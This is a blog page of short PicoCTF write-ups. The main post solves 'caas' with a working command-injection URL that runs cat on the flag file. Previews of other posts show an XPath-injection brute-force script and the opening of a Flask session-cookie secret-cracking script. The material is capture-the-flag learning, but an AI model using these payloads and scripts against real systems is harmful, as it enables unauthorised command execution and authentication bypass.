caas - PicoCTF

March 15, 2022•102 words

Look at the JS provided, while at a first look you might think there might be some SSTI involved, once you look at the code it's clear: Node runs a system command inserting user input. We only need to stop the current program's execution and start something more useful. A combination of a semicolon and anything else you might want to use is fine. For example, I used ls to see file names in the current directory and then printed the one that interested me, like this:

https://caas.mars.picoctf.net/cowsay/message;%20cat%20falg.txt

👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

Subscribe to the author

You'll only receive email when they publish something new.

More from emacab98
All posts

X marks the spot - pico

March 15, 2022•96 words

import requestsimport stringchars = string.ascii_lowercase + string.ascii_uppercase + string.digits + "}_"flag = "picoCTF{"while True: for char in chars: result = requests.post("http://mercury.picoctf.net:20297/", data = {"name": "' or //*[starts-with(text(), '"+flag+char+"')] or 'a'='b", "pass":"pass"}) if "right path" in result.text: flag += char print("Added char: " + flag) break ...

Read post

Most Cookies - PicoCTF

March 15, 2022•222 words

Followed explanation at this linkJust remember to put your cookie inside the cookie variable and update the wordlist with the possible secrets used to sign the cookie.import flaskimport hashlibfrom sys import argvfrom flask.json.tag import TaggedJSONSerializerfrom itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignaturecookie = 'eyJ2ZXJ5X2F1dGgiOiJibGFuayJ9.Yh4n3A.tAnfOTWKodF6TbdczS-Pt-JPzdM'wordlist = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbre...

Read post

caas - PicoCTF

More from emacab98All posts

X marks the spot - pico

Most Cookies - PicoCTF

More from emacab98
All posts